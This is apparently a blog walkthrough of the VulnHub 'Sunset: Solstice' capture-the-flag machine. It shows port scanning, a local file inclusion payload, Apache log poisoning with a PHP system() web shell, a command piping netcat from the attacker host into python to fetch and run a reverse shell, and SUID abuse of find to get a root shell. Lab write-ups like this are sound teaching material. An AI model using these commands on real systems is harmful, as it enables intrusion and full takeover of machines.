sunset solstice walkthrough

Today I share a vulnhub CTF sunset solstice walkthrough this VM is made by whitecr0wz. this another boot to root challenge. The difficulty of the VM Intermediate level.

Sunset : Solstice Download here

Network Scanning

Let’s jump the box and start with arp scanning with netdiscover discovering our target IP address.

netdiscover 
 sunset solstice walkthrough, solstice vulnhub walkthrough, solstic vulnhub writeup

The second step is scanning all ports and running services using the nmap command. -sV ( service & version) -p- ( all TCP ports )

nmap -sV -p- 192.168.1.5
 sunset solstice walkthrough, solstice vulnhub walkthrough, solstic vulnhub writeup

Enumeration

we see nmap scanning output our target system many ports are open after scanning we start enumeration on port 80 let’s explore the IP address in the browser.

port 80 isn’t given much more information we move on next http port 8593 here we found website library page.

http://192.168.1.5:8593
 sunset solstice walkthrough, solstice vulnhub walkthrough, solstic vulnhub writeup

After enumeration the pages url in the book list url we found local file inclusion ( LFI ) vulnerability as we see in the image file we can read target passwd file.

http://192.168.1.5:8593/index.php?book=../../../../etc/passwd
 sunset solstice walkthrough, solstice vulnhub walkthrough, solstic vulnhub writeup

then we start try to apache2 access log poising and we successfully create command injection backdoor target system server.

nc solstice.vhost 80
GET <?php system($_GET['cmd']); ?> HTTP/1.1
 sunset solstice walkthrough, solstice vulnhub walkthrough, solstic vulnhub writeup

First, we start two netcat listeners our first listener is uploading our python reverse shell target system and second is receive connection. you can upload any payload

nc -lvp 99 < shell.py
nc -lvp 444

our netcat listener is ready to connect using the netcat command we can execute and download our shell target system.

http://192.168.1.5:8593/index.php?book=../../../../var/log/apache2/access.log&cmd=nc 192.168.1.2 99 |python

After running the command our browser is stuck on the current page our system is connect our target host press Ctrl + C is used to kill a process and we successfully connect with the target machine.

Privilege Escalation

now we have access target machine www-data shell currently we have very low privileges. for privilege escalation we start enumerating the machine then we find a root process ( ps command is shown much more about the process )

we confirm this simple php server is run on local host on port 57 /var/tmp/sv directory. let’s check the server root directory. here we run the ls -ls command for checking permission of the file and we see this index.php file have full permission and group and owner of the file is root

open the file any editor I am using echo and we create an php command execution creating a malicious code setting SUID bits on find command using the curl command we can call our index.php file

ps 413
cd /var/tmp/sv
ls -ls
echo "<?php system('chmod o+x /usr/bin/find; chmod +s /usr/bin/find'); ?>" > index.php
curl localhost:57
 sunset solstice walkthrough, solstice vulnhub walkthrough, solstic vulnhub writeup

we can check the permission of find command and we see in the find command have super permission using the Privilege Escalation command we escalate the privilege.

finally we have root shell target machine let’s move the /root directory and reading our challenge flag.

ls -ls /usr/bin/find
find . -exec /bin/bash -p \; -quit
cd /root
ls
cat root.txt

Cengbox: 1 Vulnhub Walkthrough link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

One Comment on “sunset solstice walkthrough”

  1. I cannot figure the command “http://192.168.1.5:8593/index.php?book=../../../../var/log/apache2/access.log&cmd=nc 192.168.1.2 99 |python
    ” . Is there something missed?
    ps. what’s in the shell.py ?

Leave a Reply

Your email address will not be published. Required fields are marked *